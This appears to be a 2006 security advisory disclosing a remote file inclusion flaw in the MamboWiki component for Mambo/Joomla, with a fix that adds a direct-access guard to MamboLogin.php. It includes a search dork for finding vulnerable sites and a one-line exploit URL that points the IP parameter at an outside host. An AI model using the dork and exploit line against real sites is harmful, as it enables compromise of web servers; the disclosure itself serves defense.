78 lines
No EOL
1.6 KiB
Text
78 lines
No EOL
1.6 KiB
Text
.:[ insecurity research team ]:.
|
|
.__..____.:.______.____.:.____ .
|
|
.:. | |/ \:/ ___// __ \:/ _\.:.
|
|
: | | | \\____\\ ___/\ /__ :. .
|
|
..: |__|___| /____ >\___ >\___ >.:
|
|
.:.. .. .\/ .:\/:. .\/. .:\/:
|
|
. ...:. .advisory. .:...
|
|
:..................: 18.o8.2oo6 ..
|
|
|
|
|
|
Affected Application: MamboWiki <= v0.9.6
|
|
|
|
(Mambo/Joomla CMS Component)
|
|
|
|
|
|
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
Discoverd by: camino
|
|
|
|
Team: Insecurity Research Team
|
|
|
|
URL: http://www.insecurityresearch.org
|
|
|
|
E-Mail: camino[at]sexmagnet[dot]com
|
|
|
|
|
|
|
|
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
Typ: Remote [x] Local [ ]
|
|
|
|
Remote File Inclusion [x] SQL Injection [ ]
|
|
|
|
Level: Low [ ] Middle [ ] High [x]
|
|
|
|
Application: MamboWiki
|
|
|
|
Version: <= 0.9.6
|
|
|
|
Vulnerable File: MamboLogin.php
|
|
|
|
URL: http://www.lyquidity.com
|
|
|
|
Description: A component like Wikipedia for Jooma/Mambo.
|
|
|
|
Dork: inurl:"com_mambowiki"
|
|
|
|
|
|
|
|
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
http://[sitepath]/[joomlapath]/components/com_mambowiki/ MamboLogin.php?IP=http://huh?
|
|
|
|
|
|
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
o1.) open MamboLogin.php
|
|
|
|
o2.) add this in line 8:
|
|
|
|
defined( '_VALID_MOS' ) or
|
|
|
|
die( 'Direct Access to this location is not allowed.' );
|
|
|
|
o3.) done!
|
|
|
|
|
|
|
|
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
|
|
|
|
|
|
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)
|
|
|
|
# milw0rm.com [2006-08-18] |